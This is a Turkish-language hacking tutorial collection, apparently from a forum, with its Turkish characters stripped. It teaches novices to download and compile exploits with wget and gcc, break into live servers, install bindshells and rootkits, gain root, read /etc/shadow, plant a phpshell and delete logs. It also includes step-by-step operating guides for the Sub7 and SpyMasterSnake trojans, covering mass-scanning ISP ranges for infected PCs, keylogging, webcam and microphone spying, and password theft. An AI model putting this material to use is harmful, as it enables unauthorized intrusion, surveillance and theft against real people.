iyidir.. Shell kvramn bilmeyenler iin aklamak istiyorum.. Shell Nedir : Shell Linux iletim sistemi kullanan bir makineden size verilen kstl yetkilere sahip olduunuz alan dr.. Bi yerdir yani.. Bu alana putty program aracl ile balanlabilir.. Kullanlan port ve protokol ; SSH protokolu ve 22. Porttur.. SSH gvenlidir.. telnet gibi deildir yani.. Bu Shell hesabna ircd kurulabildii gibi exploit compile olaylarda yaplabiliyor.. Bu ksm anlalmtr umarm.. birazda putty programna deinelim.. nceden hazrladm ksa bir yazm aynen yazyorum.. Putty Nedir : Putty Telnet/SSH Clientidir.. Bu programla telnet ve SSH sunucularna rahatlkla balanabilir komutlar program zerinden girebilirsiniz... Kullanm olduka basittir..Download blmnde putty program mevcuttur.. imdi putty i download ettikten sonra... program altrn... "Host Name ( or IP adress)" yazan kutucua shell inizin ip sini yazacaksnz... Hemen o kutucuun altnda "Protocol" seenekleri var balanmak istediiniz sistemin protokolune gre ordan birini seeceksiniz SSH sunucusuna balanorsanz "SSH" yi telnet sunucusuna balanorsanz "Telnet" i seeceksiniz.. Bizim balanacamz sistem linux olduuna gre ve bu sistem SSH protololu kulland iin "SSH" yi seiyoruz.. "SSH" yi setikten sonra sa alttaki "open" botonuna basn... nnze siyah bir ekran kacaktr buraya Shell username inizi yazn enterlayn.. Pass inizi isteyecek onuda yazp enterlayn... Shelle balanm olacaksnz... imdi Linux makinaya balanm olduumuza gre bi ka lin! ux komutundan bahsedeyim... ls : olduunuz dizindeki dosyalar listeler.. (rnek: ls ) rm -rf dosyaadi : belirttiiniz dosyay siler.. (rnek: rm -rf apache.c) wget : Dosya ekmeye yarar... (rnek: wget http://ctrspawn.kolayweb.com/Apache_1.3.x.c) gcc -o : C dilinde yazlm programlar derleme komutudur... Biz genellikle bunu exploit kodlarn derlemek iin kullanacaz (rnek: gcc -o Apache Apache_1.3.x.c) ./ : altrma komutudur.. (rnek: ./Apache) Exploit Compile Nasl yaplr : imdi Shell imiz var ve putty program ile shell imize balandmz var syarak anlatyorum... ncelikle kullanacamz 3-5 temel komutumuz var.. bunlar rneklerle aklayacaz.. nceki bir screen shot la yazm aynen yazyorum...

Burdaki Alt "Krmz" renkle izilmi olan lar kullandm komutlardr...Bu komutlar srayla aklayalm.... "wget http://ctrspawn.kolayweb.com/Gtkftp_v1.0.4.c" Bu komutla http://ctrsapawn.kolayweb.com/Ftkftp_v1.0.4.c isimli dosyay ekioruz yani wget komutu dosya ekmeye yaror.... "gcc -o Gtkftp Gtkftp_v1.0.4.c" Bu komutla Gtkftp_v1.0.4.c isimli exploiti derliyoruz... ama derlenmi olan exploiti Gtkftp adnda kaydediyoruz... Bu komutla bu dediklerim oluyo... "./Gtkftp" Komutu ile bu exploitle birlikte kullanabileceim parametreleri grdm... Yani exploiti altrmay denedim ama yetersiz parametre kullandm iin bana aklama verdi kullanabileceim parametrelerin bi listesini verdi.... "./Gtkftp -h www.cyberterrorz.com" Komutu ile www.cyberterrorz.com sitesi zerine bu exploiti altrmay denedim ama verdii uyarda www.cyberterrorz.com sitesi "<- 220 ProFTPD 1.2.7 Server (ProFTPD) [OEI.guncelturk.net] [!] error: this exploit is only for GtkFTPd, failed. " proFTPD kullanor ve bu exploit sadece Gtk ftp kullanan host larda alr dio...

Olay bundan ibaret screenshot u iyice inceleyin bi ok ksm anlayacaksnz zaten.... Exloit compile etme ve altrma olayda akla kavtu imdi bir sisteme nasl girilir onu grelim.. Exploit Kullanarak Sisteme girmek : nceki yazmda anlattm ve screenshotunu aldm bir remote Attack 'm olmutu..

imdi en can alc noktaya geldik... Yukarda rnekle gsterdiklerimi imdi uygulamaya dkeceim... Bunun iin ncelikle bir hedef belirlemem gerekiyor... www.XXXXXX.com serverlarna gireceim.. ilem srasna gelince.. 1- www.netcraft.com sitesinden server infosunu almak.. yada sitemizde werdiimiz scan_projecti kullanarak httpd server infosuna bakmak.. 2- Gerekli exploiti temin etmek... 3- Shell 'e login olup gerekli exploiti shell e ekmek ve kullanmak... 4- Servera bindshell kurmak...(bunu loglara kayitlanmamak iin yapiyoruz ve ayrca shelin kapatilmasi sz konusu olabilir.. 5- Serverda root olmak... 6- Rookit kurmak (binshelle idare ederim diyorsanz gerek yok) 6- Loglari silmek lemleri srasyla yapyorum... 1- Server infosunu aldm.. Kullanlan server bilgileri yle; The site www.XXXXXX.com is running Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6 PHP/4.0.4pl1 mod_perl/1.24_01 on Linux. 2- 7350 fun Exploit i ile bu servera girebilirim... 3- Shell e login oldum... Exploiti ektim altrdm... 4- HPbindshell i kurdum... 5- ptrace-kmod exploiti ile serverda root oldum... 7350 exploiti kaynak kod halinde deil derlenmi halde datlyor ayrca eski bir exploittir...imdi screenshot u yaynlayacam..... Ben bu sisteme dkman yazmadan nce girmitim... dolaysyla baz yerleri atlamam gerekiyor...Bu sistemde bu ak hala mevcuttur... 7350 yi hebele olarak shell e kaydettim... Kulandm komuta gelince... Exploit brute force yntemi ile alor... Ben brute force un etkili olduu ksm direkt yazarak ksa yoldan sisteme girdim.. Screenshot un sonunda yazan yazlar gelince bi sre bekledikten sonra shell e drecektir..Sonraki ilemler... Aslnda istesek bu ekilde shell kullanarak oraya girebiliriz... Ama bi sre sonra Read Error verip bizi drecektir...O yzden bindshell tr bir program kurarak bu sorunu hallederiz... Ama ncelikle yazma iznimizin olduu bir klasre girelim genel olarak /tmp/ dizininie yazma iznimiz vardr baz sistem yneticileri bunuda kaldryor ama nadir olan bi olay.. Tmp dizinine gemek iin "cd /tmp" komutunu uygulayn... Bu konu ile ilgili tm sorularnz forumlarda sorabilirsiniz.. Bind Shell kurulumu : imdi sisteme bindshell denilen bi eit trojan nitelii tayan bir program kurmak gerekecek.. amac sistemdeki belirli bir portu bindshell olarak amas ve buraya balanmay salamasdr.. bindshell tr programcklar download blmnde bulabilirsiniz.. Exploitle ieri dnce bi nevi shell hesabmz oluyor o makinada.. ama anonymous bir shell.. id mizde nobody yada farkl biey yazar.. Normal de Shell hesab olanlarn /home/ dizini altnda bir klasr olur.. Geri klasr olay root a baldr ama geneli byledir.. bu Anonymous girite bu dizin altnda klasrmz olmaz.. bindshell kuruyoruz nki her zaman exploiti kullanp sisteme remote attack dzenlemek zorunda

kalmayalm diye.. Her zaman Exploitin sonu verecei kesin deildir ak patch lenmi olabilir.. ve Exploitlerin ksa srede sonu vereceide kesin deildir.. Neyse bindshell kurulumunun anlatlacak bi taraf yok ./bindshel deyip kurulur.. Sonrasnda sistem hakknda biraz bilgi alarak siste! min nasl rootlanacana baklr.. "uname -r" Komutu ile kernel in srm renilip buna gre local root exploit uygulanabilir yada "ps x" gibi komutlarlada alan uygulama ve programlara grede baklabilir.. Burada biraz Linux bilgisi ister... imdi u ksma dikkat edin.. ncelikle bir remote attack dzenledik sisteme girdik.. imdi ise bir local attack dzenleyip root olmaya altk.. ilem sras o ekilde ilerliyor.. nce sisteme girmek gerekir sonra local bir attackla sisteme sahip olamk gerekir... Sistemde bir hesabnz olursa remote attack ksmn eleyip local attack yntemlerine bakarsnz olay bu... Sistemdeki ifreleri almak iin "cat /etc/shadow" komutunu uygulayp /etc/ dizini altndaki "shadow" isimli dosyann ierii ekrana basabilir shadow pass leri alabilirsiniz.. ama sistemde root olduktan sonra ne gerei varki zaten sistemdeki istediiniz her dosyaya her siteye eriim salarsnz.. Root olduktan sonra sisteme bir rootkit kurarak gizli giri k yapabil! irsiniz.. Rootkit olayn ManiaC arkadamz anlatm gzelce.. "System hack & Rooting" Blmnde var olan bu dkman okuyabilirsiniz.. Unutmayn Her trl Sorununuzu yada probleminizi kafanza taklan her eyi Forumlarda Sorabilirsiniz.. Bir Saldr Anatomisi... Gnmzde Hack olayna duyulan merak ve ilgi olduka fazla ve gnden gnede artyor.... Ama srekli yanl ynlendirme iin kolayna kama ve ezber olaylar yeni yetiecek genlerin geliimini olumsuz etkiliyor...Mail account larnn ele geirilmesi, ICQ uin lerinin yada irc serverlarna clone sokmann hacker lk yada bu ileri yapana hacker denildiini zanneden kardelerimize yol gstermeye alacam... Hacker lamer cracker gibi kavramlar anlatmayacam ama hacker larn izledii yolu ele geirmek istedii sistemi nasl hacklediklerini anlatmaya alacam.. ncelikle asl konumuz bir sisteme eriebileceimiz yollar grmektir ki buda hackerlarn izledii bir yoldur.. 1234Sistem Hakknda olabildii kadar bilgi toplamak... Bilgileri deerlendirebilecek materyallere ulamak... Materyalleri srayla kullanmak... Sonuca ulamak...

1- a) Nmap kullanmak.. Nmap programn duymusunuzdur.. Esiz bir scannerdr.. Burada dikkat edilecek nokta bu scanner herhangi bir a scan yapmyor.. O eskiden kalan cgi scanner vs.. tr scannerlar beyninizden silip atn.. nk biz site hacklemiyoruz.. Zaten site hacklenmez deface edilir.. Girmek istediimiz sistem hakknda bilgi toplamak iin en uygun aratr.. Bize lazm olacak hemen hemen her eyi bu programla bulabiliyoruz.. Programn zelliklerine gelince... Derinlere girmeyeceim serverda alan daemon lar ak portlar ve bu daemon larn srmlerini verebilen SYN Stealth, ping tr scan yapabilen tam bir hacker aracdr.. Normal port tarayclar ping mant ile alr srayla tm portlara ping atar ve pong gelirse yant alm olur ve bu portu ak syler.. nceden program yazar port listi programa girmitir ak port a denk gelen text i ekrana yazar.. rnein 21. portu ak buldu port list te ne 21. port a denk gelen yaz neyse onu size syler.. nmap n ping tr taramasda ayn! sekilde alr yanlz ak bulduu portu listeden deil ne amala kullanldn tespit edip syler.. ping tr taramalar server n loglarnda grlr.. hangi porta hangi ip den ping atld log larda belli olur.. ama nmap n en mthi zellii olan SYN Stealth tarama % 90 orannda loglarda gzkmyor.. kalntlar olabiliyor ama gvende olduunuz hemen hemen kesindir.. namp Linux altnda alan komut tabanl bir scannerdr.. sistemde ykl olmas gerekir ve hemen

hemen tm server larda default olarak Linux la birlikte kurulu olur.. serverlarda olur ama sizde de olmas gerekir.. en ideali Linux bir makineye sahip olmanzdr.. nk shell lerde nmap kullanamazsnz root yetkisi ile alr.. permission verilmise kullanrsnz bu i kasar biraz.. Linux iletim sistemi kullandnz var sayarak anlatmaya devam ediyorum.. Konsol da "nmap" yazarsanz size uzunca bir arguman kartacaktr.. incelediiniz zaman ne kadar fonksiyonel bir scanner olduunu greceksiniz.. biz sade! ce "nmap -sS -T4 -F -A -O ip" komutunu kullanacaz.. ihtiyacnza gre parametreleri dzenleyebilirsiniz.. ip yazan ksma Hacklemek istediiniz sistemin ip adresini yazacaksnz.. Scan sonucunu almak iin bi sre beklemeniz gerekecektir.. Tarama sonucuna baknca bi sr yaz yazdn greceksiniz.. Burda amacmza ulam oluyoruz.. Ama bu nmze kan eyler ne ie yarayacak ? Bu sonularda ; PORT STATE VERSION Balklar altnda ak port stats ve kullanlan daemon ve versiyonlar yazyor.. Bu sonuca gre alan daemon aklarn kullanp server 'a girme yollarn denemek gerekecek.. 1- b) Scan Project kullanmak.. Bu program shellde alabiliyor.. ve bir Trk arkadamz yazd... Yapt ilem kolay 80. port aksa bu portun infosunu alarak 80. portu kullanan daemon un infosunu ve zerinde alan modlleri listeler.. Biliyorsunuzki apache daemon u modller le birlikte alr.. mod_ssl, mod_mylo, mod_perl vs.. vs.. bu modllerinde aklar vardr bize lazm olabilir diyerekten sonular alalm.. fazla bilgi gz karmaz.. program .c uzantl code halindedir.. gcc komutu ile derlenip kullanlabilir.. 2- Ulatmz bilgileri deerlendirecek materyallere ulamak... Sonularda apache daemonu versiyonu ve mdllerini bulduk diyelim.. Bir Hacker bu bulduu sonulara gre exploit yazabilen birisidir O bulduu stat versiyon daemon lara gre olduka risk gerektiren sonular retebilir.. Bu dkman okuyan ahslarn bu derecede olmadna gre biz exploitlere ulamak iin gerekli web adreslerini vermekle yetineceiz... www.packetstomsecurity.nl , www.securityfocus.com gibi security ierikli sitelerde gerekli materyallere ulalabilir... ingilizce dil bilmenin bu olayda ok byk olumlu etkisi olacaktr.. Ama buna gerek kalmad www.cyberterrorz.com adresi bunun iin yaplandrld.. Ulaabileceiniz tm materyaller bu sitede mevcuttur.. Bulduunuz exploitleri bir shell de compile edip kullanabilirsiniz.. 3- Materyalleri Srayla Kullanmak Remote attack iin ulatmz bu sonular ve bulduumuz tm materyalleri shellde denemek gerekir.. eer bir sonu alnamadysa.. Ki hacker lar mutlak sonu alr ama bulabileceiniz materyaller public olduu iin girmek istediiniz server da aklar patch lenmi olabilir.. Bu durumda bir Local attack uygulanacaktr.. Sistemde shell verilmedii byk bir olaslk tar bu durumda ftp ile bir local attack uygulayacaz.. Girmek istenilen server n Linux olduunu var sayyorum.. Bu durumda kar sistemden bir ftp accountu alnr bir host yani.. Bu hostumuzda php destekleniyordur.. phpshell.php isimli bir dosya vardr bu dosya browser zerinden server a komut ilemeye yarar.. servern safe mode off konumunda almas gerekir ki % 90 serverlar bu ekilde alr.. Burada uygulanacak adm browser a aldnz siteyi ve phpshell dosyasnn path ini yazmaktr rnein : www.site.com/phpshell.php yazdktan sonra alan sayfada komut satrna "cd /tmp; mkdir .h; cd .h" komutunu uygulam! aktr.. bu komut /tmp dizin altnda "h" adnda bir gizli klasr oluturur... bu klasre bindshell aan bir dosya ekip altrmak gerekecek sonra putty ile bindshell portuna balanp local root exploitle sistemi rootlamak gerekecek.. Genelde bu yntem remote attack lara gre daha etkili sonu verir... 4- Sonuca ulamak ..

Sonu dediimiz nedir ? Sisteme girmek iin bir nedenimiz olmas gerekir deilmi.. Bir hacker neden bir sisteme girer deface iinmi kesinlikle hayr..Tandm hi bir hacker deface ypatn grmedim.. Ama denilen ey o makinede bulunan bir bilgi bir log yada bir dokumandr..Sizinde amacnz bu olsun sisteme zarar vermenin yada boy gsterisi yapmann hacker lkla alakas yoktur..

SUPER SCAN PROGRAMI KULLANIMI


Hostname Lakup:Buraya hangi ip araln taramak istiyorsak sadece bir tane ip numaras giriyoruz Lakup a tklyoruz bilgisayarn hostu balant adresi kyor yazdmz ip o an nette deilse herhangi bir ey yazmyor. 1-255 ip aral tarattrmak istiyorsak.ip ksmnn altnda 1..254 butonuna tklyoruz. diyelimki ayn anda schoolbus-Sub7-Netbus pro trojanlarn taratmak istiyoruz. Port List Setup butonuna basyoruz Port List File ksmndan trojan seiyoruz.Evet trojan listesi nmze geldi ve birok sayda trojan ama biz bunlarn hepsini taratmak istemiyoruz hepsini taratmaya kalkarsak ok zaman alr. Clear All butonuna basyoruz trojanlarn yanndaki iaretlerin hepsi kalkt Schoolbusu taratmak iin 54321 portu sub7 iin 27374 Netbus pro iin 20034 iaretliyoruz ben tane trojan setim siz sadece Schoolbusu veya subu veya istediinizi seebilirsiniz.Setikten sonra OK butonuna basyoruz evet hayr geliyor hayr iaretliyoruz.Tekrar ana sayfaya dndk.Starta basyoruz. O ip araln seri bir biimde taryor Active host ksm o ip aralnda aktif nete bal durumdaki pclerin saysn gsteriyor Open ports ise bize gerekli olan ksm yani aradmz torojanlarn o ip aralnda ka adet olduunu gsteriyor.Yanlarnda art olanlar trojanl pc ler. artlara teker teker basabileceimiz gibi scan ileminin bittiken sonra da tklayabilirir. Hi tavsiye etmem Scan ileminin bitmesini bekleyin ip arama bitince diyelimki 195.175.101.1 / 195.175.249.255 gibi byk bir ip aral tarattnz nnze tahminimce en az 5000 civar aktif pc kacak yani tahminen 5000 civarnda aktif pc iinde trojan arayacak bulabilecei trojan says o andaki duruma gre 20 olur 5 olur hi olmaz 30 olur her neyse tarama bittikten sonra Expand all butonuna basyoruz yannda + iaretli yani aradmz trojanl pcler alyor. Daha sonra Prune butonuna basyoruz ekranda sadece aradmz trojanlar kalyor dier binlerce iimize yaramayan pc listesi kayboluyor ve trojanl ipleri teker teker clinte giriyoruz.Sadece 1-255 aral taratacaksak yukarya her seferinde ip numaras yazmaya hi gerek yok PrevC Geriye doru 1-255 aralk arama NextC ileriye doru 1-255 ip aral tarama bu butonlara basmanz yeterli. Eer ok byk ip aral tarayacaksak Starta balang ip no elle giriyoruz.Stop a biti ip no yine elle giriyoruz. ok ksa bir zaman dilimi iinde ka tane trojan bulmak isterseniz binlerce pc yi tarayarak nmze getiriyor. Evet en kullanl en seri u anda emsali olmayan cretsiz Super Scan n sadece trojan blm iin anlatlmas gereken ksm bu. All ports from la tm ak portlar taratabilirsiniz. Tm ak portlar ok ksa zamanda bulur telnetten balanr.Daha birok zellii mevcuttur

SUB7 KULLANIMI

Zipli dosya iinde 3 exe dosyas birlikte gelecektir. Bunlar Subseven.exe Editserver.exe ve server.exe dir. Bu dosya lardan Server.exe yi kesinlikle kendi bilgisayar nzda amamanz gerekiyor. Aksi takdirde kendi kendinizi infecte etmi olursunuz ve trojan sizin bilgisayarnza yerleir. nce subseven.exe ye tklyoruz. Karmza subseven n al mens geliyor. imdi Subseven trojan bulam bilgisayarlar bulmaya alacaz. Connection Blmne tklyoruz ve kan menuden ip scanner seiyoruz. Burada start ip ve end ip aralna Trkiyedeki internet servis salayclardan birinin ip araln yazyoruz. (rnein; 213.43.50.1 - 213.43.255.255) Daha sonra port ksmna subseven in portu olan 27374 yazyoruz. Delay saysn ykseltirsek daha ayrntrl ama daha yava bir arama yapar. Daha sonra start a basyoruz. Bir sre sonra bir ka tane ip numarasnn bulunduunu greceksiniz. Bunlar subseven trojan bulam bilgisayarlardr. Bunlardan birisini yukardaki ip/uin ksmna yazyoruz ve connect e basyoruz. Ve karmza ifre soran bir kutucuk kacak. Eer bu bilgisayar daki trojana ifre konmamsa OK ye basd mzda balandmza greceiz. Ve alt satrda connected 21:25.21,Kasm 19, 2000, Pazar, version: BoNuS 2.1 gibi bir yaz kacak. Artk kurbanmzn bilgisayarna girdik. imdi baka neler yapabiliriz onlar grelim. <!--[if !vml]--><!--[endif]--> * Connection Get pc info: Buradan kar bilgisayar hakknda bilgi alabilirsiniz. Cleant connection victim e ka kiinin bal olduunu gsterir. lgin ama bu deer bazen 4-5 olabiliyor. Get home info: Kendi bilgisayarnz hakknda bilgi verir. Server options: Server ayarlar yapmanz salar. Portunu deitirebilir (change port), Portu default port (27374) olarak ayarlayabilir (set default port), ifre koyabilir (set password), ifreyi silebilir (remove password), internet balantsn koparabilir (disconnect victim), Server yeniden balatabilir (restart server), server silebilir (remove server), server bilgisayar yeniden alnca tekrar alacak ekilde kapatabilir (close server), Server n yeni srmn kendi bilgisayarnz dan veya internette yerletirdiiniz bir site den yenileye bilirsiniz (update server from local file / URL file). Ip Notify: Subsevenn engzel zelliklerinden birisi, kurbannz internete balandnda burada yapacanz ayarlar sayesinde size icqdan, mRC den bir kanala veya bir nicke, veya email adresi nize uyar mesaj geliyor. * Keys/messages Keyboard: Victim n klavyesiyle yazd hereyi buradan grebilirsiniz. Chat: Buradan kurbannzla (uyandrmamak iin tavsiye etmem) veya ona bal dier bilgisayarla chat yapabilirsiniz. Matrix: Matrix i aktive ettiinizde victim n bilgisayar ekrann tamamen kaplayan ve onunla chat yapmaya yarayan bir grnt kyor Msg menager: Buradan victim n bilgisayar ekrannda kacak deiik mesaj ayarlar yapabilirsiniz. Yaratclk size kalm . Spy: Victim cq, Aol, Msn ve yahoo mesanger gibi chat programlarndan birini kullanyorsa ona gelecek olan mesajlar buradan gzetleyebilirsiniz. cq takeover: Buradan daha nce kulland veya u an kullanmakta olduu icq uin lerini bulup bunlar kendi icq dosyanzn iine download edebilirsiniz. Bu sayede victim in icq dan daha nce yapt btn konumalar ele geirmi olacaknz. Takeover ilemi biraz uzun srebilir. Bittikten sonra kendi icq nuzu yeniden balatn, sonra icq da change active user mensn kullanarak victim n kulland icq ya geebilirsiniz. Mesaj arivindende daha nce yapt konumalar okuyabilirsiniz. <!--[if !vml]--> <!--[endif]-->

* Advenced Ftp/http: Victim a ftp aarak Subseven clienti kullanmadan da balanabilirsiniz. Find files: Dilediiniz formattaki dosyalar burdan rahatca bulabilirsiniz.

Password: Buradan victim n bilgisayarnda kaydedilmi olan eitli ifreleri ele geirebilirsiniz. Reg edit: Victim n regisry editor unu ap oynama yapabilirsiniz. App redirect: eitli dos komutlarn victim n bilgisayarnzda altrabilirsiniz. Port redict: Ak olan portlarn grp bunlara ekleme veya karma yapabilirsiniz. * Miscellaneous File manager: Btn dosyalara burdan ulap download, upload, ve daha birok ey yapabilirsiniz. Window manager: windows altnda almakta olan programlar buradan grp onlarda oynamalar yapabilirsiniz. Text-2-speech: Buradaki kutuya yazacanz yazlar victim n bilgisayarnda sesli olarak okutabilirsiniz. Ama bunun iin nce text-2-speech plugin ini kendi bilgisayarnza yklemeniz gerekiyor. Clipboard manager: u an almakta olan programlar grp istediimizi kapatabiliriz. rc bot: rc bot aabiliriz. Bununla ilgili geni bilgi zip dosyas iinde txt olarak var. * Fun menager Desktop/webcam: Burada victim n bilgisayarnn ekran grntsn alabilirsiniz. full screen capture yi kullanrsanz bir defalk grnt alrsnz, open screen prewiev i kullanrsanz sizin belirleyeceiniz aralklarla srekli grnt alrsnz. Ayrca buradaki kutuyu yanlarndan ne kadar ok bytrseniz grnt kalitesi o kadar netleiyor. Ve aadaki allow mouse clicks kutcuunu da iaretlerseniz. size gelen ekran grnts zerinde yapacanz tklamalar victim in bilgisayarna yansyacaktr. webcam/quickcam capture blm trojan olaynn ne kadar ciddi bir olay olduunu gsteriyor. Buradan eer kurbannzda web kameras varsa kendi grntsn hatta odasndaki grnty bile kaydedebilirsiniz. Evet yanl duymadnz <!--[if ! vml]--> <!--[endif]--> Flip screen: Bu zellii kullanarak bilgisayarn ekran grntsn yatay ve/veya dikey dzlemde evirebilirsiniz. Print: Yazc dan herhangibir yaz karabilirsiniz Browser: Buraya yazacanz herhangibir web sayfasn karki bilgisayarda aabilrsiniz. Resolution: Buradan ekrann znrlnde oynama yapabilirsiniz. Win colors: Buradan windows un renklerini deitirebilirsiniz. * Extra fun Screen savers: Ekran koruyucuyu deitirebilirsiniz. Restart win: Windowsu eitli ekillerde kapatabilirsiniz. Mouse: Mouse ayarlaryla oynayabilirsiniz. Sound: Kurbann odasndan ses kayd yapabilir veya ses ayarlar ile oynayabilirsiniz Time/dite: Bilgisayarn tarih ve saat ayarlarn deitrebilirsiniz. Extra: Burada cd romu ap kapama, monitr ap kapama gibi extra zellikler mevcut. Local options: Local options blmnde de subseven n kullanm ile ilgili ayarlar yaplmaktadr

SpyMasterSnake FTP Trojan Help Dosyas

SpyMasterSnake FTP Trojan (SFT), aslnda ok basit bir mantk zerine hazrlanm olsada, tam verimle kullanlabilmesi iin iyi derecede bilgisayar ve FTP bilgisine sahip kullanclara gereksinim duyar. SFT, bal bana hem bir Unix ilevli FTP server hemde Windows tabanl (Win9x,WinME,WinXP,WinNT,Win2K) bir Trojandr. SFT'nin esas yaplma nedenleri arasnda, Herhangi bir nceden belirlenmi, hazrlanm, Client'e ihtiya duymadan, Bir Trojan'n zelliklerini kullanmak ve ayn zamanda bir FTP server'nn dosya transferlerindeki hzndan ve gcnden istifade ederek, ald bilgisayar bir FTP server'na dntrp, makinede olan biteni, grsel, iitsel ve yazl olarak, Trojan sahibine yollamaktr. SFT iinde bir ok ilevi bulundurmaktadr. Bunlardan balcalar unlardr: Unix Type FTP Server. Her trl dosya transferi iini en ksa ve kolay yoldan yapabilmektedir. Mesela: Kalnan yerden download'a devam edebilme, kalnan yerden upload'a devam edebilme, ayn anda bir dosyay paralayarak alma, ayn anda bir dosyay paralayarak upload etme, V.s. gibi. Keylogger ve Pano Logger. Bu iki zellik sayesinde, kurbann yazm olduu herey ve bam olduu klavyedeki tular bir dosyada pencere adlaryla kaytl tutulur. Bylece yazlan Email ifreleri, yollanan mailler, yollanan adresler, chat yaplan kiiler, chat yaparken yazlanlar, ksacas kullancnn yazd herey kaytl tutulur. Bununlada kalnmaz, Pano Logger (Clipboardlogger) ile de kullancnn Kopyalad her text bir dosyada tarihleri ve pencereleriyle kaytl tutulur. Bylece klayeden girmeyip kopyalayarak yollad, yazd textlerden de haberiniz olur. Bunlar size maille yollanr. ICQ 2003 ifre , Internet ifreleleri gibi bilgisayarda tannan ve gizlenen ifrelerin alnmas. Bir trojann yapabilecei herey ve daha fazlas! rnein MSN alma gibi zellikler eklemedim, nk MSN gibi messengerlarn bilgileri zaten bilgisayarda sakl oluyor. Bunlar registryde olduu iin, SFT'nin Registry komutlaryla bir MSN yada baka herhangi bir program rahatlkla TakeOver yaplabilir. Ayn ey ICQ History ve ifreleri iinde geerlidir. nk sonuta bunlarn hepsi dosya veya registryde saklanmaktadr. Clientsiz kullanm. Kurbannza, Linux, BeOS, Mac, PS2 gibi dier iletim sistemi ve Pc ortamlarylada balanabilirsiniz.

SFT ile bir bilgisayara girmek iin, Server editr programn altrp, server' ykleyip gerekli ayarlar yapmanz gerekmektedir. Daha sonra, kurban'n IPsi ile ilgili bilgileri ve daha fazlasn alabilmek iin, IPSENDER.php dosyasn, lycos yada lycos.co.uk gibi PHP dosyalarna izin veren bir siteye yada kendi sitenize upload edeceksiniz. IPSENDER.php iindeki bilgileri kendi isteinize gre ayarlamalsnz. inde bulunan mail adresi bilgisini ayarladktan sonra sitenize upload etmeli ve "Sender URL" ksmna, ipsender.php nin tam urlsini girmelisiniz. rnein, http://www.spymastersnake.org/ipsender.php gibi. Kurbana balanmak iin Bir FTP Clienti yada Telnet gibi komut ileyecek bir client'e ihtiyacnz var. Hangi tarz FTP program kullandnz nemli deil, ancak ben "Pro" versiyonlarn neriyorum. zelliklede "Cute FTP Pro". Eer ki hibir FTP program yoksa, zlmeyin, MS-DOS komut penceresini ap FTP yazarakta bu ii yapabilirsiniz :) XP Pro makinalarda yolladnz serverlar iin dikkat etmeniz gereken bir husus var. Bazen server' yolladnz anda kurbana balanamayabilirsiniz. Bu durumlarda server'a balanabilmeniz iin kurbann bilgisayarn yeniden

balatmas gerekebilir. nk server, bilgisayardaki tm gvenlik nlemlerini kapattktan sonra bilgisayar yeniden balamaya ihtiya duyar. Bu durum sadece sizin balanmanz geciktirir. Ancak server ald anda greve balar ve size mail ile tm gereken kaytlar yollar. rnein Cute FTP Pro ile, server'a balanmak iin unlar yaplmal: Program ap, yeni bir balant ekleyin, FTP Hostname ksmna kurbann ipsini, Port ksmna ve dier ksmlara ise ayarladnz deerleri yaznz. Daha sonra Connect tuuna basp, kurbana balannz. Balandnzda karnza gelecek olan Remote klasr, HomeDir olacaktr. Diyelim ki kurbann masastn grmek istiyorsak, FTP Logunun olduu ekranda sa tua tklayp, Enter Raw FTP Command' ( Yada Commands --> Enter Manual Cmd) semeli daha sonra "capture" yazmalsnz. Komut Alnd gibi bir mesaj grrseniz, bu komutunuzun karya gittiini gsterir. ScreenShot alnd gibi bir mesaj da grrseniz, bu masastnn grntsnn HomeDir Altna "sc.gif" olarak kaydedildiini gstermektedir. Bu dosyay almak iin, remote folder' refresh yapn ve dosyay download edin. Eer ki Kurbana Her windowsta bulunan FTP komutuyla balanmak isterseniz: En nce servernzn portu 21 olmaldr. Aksi takdirde FTP komutu kurban grmez. Servernzn portu 21 ise, MS-Dos penceresini an ve "FTP" yazn. Daha sonra "Open kurbannIPsi" yazn. Size Username soracaktr, girin ve daha sonra ifre soracaktr, onuda girin. Login olduktan sonra, Remote folder HomeDir olacaktr. Masastnn grntsn almak iin komut olarak "literal" yazn. Daha sonra kan bo alana "capture" yazn. Cevap mesaj kacaktr. Daha sonra "ls" komutuyla klasrn ieriini grntelip "get" komutuyla "sc.gif" gibi bir isimle kaydedilmi dosyay alabilirsiniz. Eerki CuteFTP yada baka FTP programyla balant hatalar alrsanz "PASV" modu yerine "PORT" modu kullann. Yada tam tersi. Kar makinedeki gizli ve sistem dosyalarn grmek iin "NLST" Simple Directory Listing yntemini kullann. Bir FTP Clienti ile hata alrsanz, baka bir client kullannz. Diyelimki Bir internet kafedesiniz, ve antivirs programlar var. Sizinde kurbannza balanmanz lazm. Normal bir trojanla bir nceden hazrlanm client'e ihtiyacnz olacaktr, ancak o client'i boyutu hem byk olacaktr hemde clienti anti-virs ykl bilgisayarda aamayacksnz. Ancak SFT iin byle bir durum sz konusu deil. Onun client'ini Microsoft, her Windows ile beraber datyor :) Bylece nerde olursanz olun bir ey download etmeden kurbannza balanm olacaksnz. Ayn ekilde kurbanlarnzn IPsi size IPSENDER.php zerinden maille gelecektir. Bunun yannda, isterseniz, size ifreleri, yazdklar, kopyaladklar ve daha bir ok bilgide gelecektir. Ksacas isterseniz bu program FTP diye, isterseniz, Trojan diye, sterseniz Keylogger diye kullanabilirsiniz :) Ayrca iinde bir SMTP clienti olmayp bu ii bir php dosyas ile yapmas, maillerin kaybolmadan size gelmesini salayacak ve isterseniz, biraz php kodlama biliyorsanz, kendinize Victim List yapabilir, var olan baka bir trojan'n (Sub7) Victim Listesini kullanabilirsiniz. Eer ki php yada Perl ile socks biliyorsanz, verileri icq yada her hangi bir programada yollatabilirsiniz :) Yani bir kstlama yada kalp mevcut deildir... Kurbanlardan gelen bilgileri, onlarca hatta yzlerce mail adresine databilir ve belirli bir kurbandan gelen maili belli bir mail hesabna yollayabilirsiniz.

